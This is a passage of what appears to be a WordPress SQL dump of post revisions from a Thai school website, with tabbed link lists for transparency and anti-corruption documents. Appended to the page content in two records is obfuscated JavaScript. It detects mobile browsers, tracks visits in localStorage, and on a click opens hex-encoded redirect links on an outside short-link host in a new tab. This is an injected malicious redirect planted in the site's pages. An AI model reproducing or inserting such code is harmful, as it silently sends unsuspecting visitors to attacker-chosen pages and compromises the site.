)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ITA ONLINE 2025','','inherit','closed','closed','','871-revision-v1','','','2025-07-01 14:34:13','2025-07-01 07:34:13','',871,'http://pakhaeng.ssk.in.th/?p=1573',0,'revision','',0),
(1574,1,'2025-07-01 14:38:36','2025-07-01 07:38:36','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":1259,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/2025.png\" alt=\"\" title=\"2025\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"currentTab\":3,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#f78da7\",\"titleBgHover\":\"#cf2e2e\",\"titleBgActive\":\"#cf2e2e\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#f78da7\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-3 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"cda4f9-0b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tabcda4f9-0b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469↗\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"size\":16,\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"e71bc9-b1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tabe71bc9-b1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"bab0c3-88\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tabbab0c3-88\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1558\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"942a96-06\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab942a96-06\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1502\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"42916d-7b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab42916d-7b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"357ff8-b0\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab357ff8-b0\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"77d9b7-d1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab77d9b7-d1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\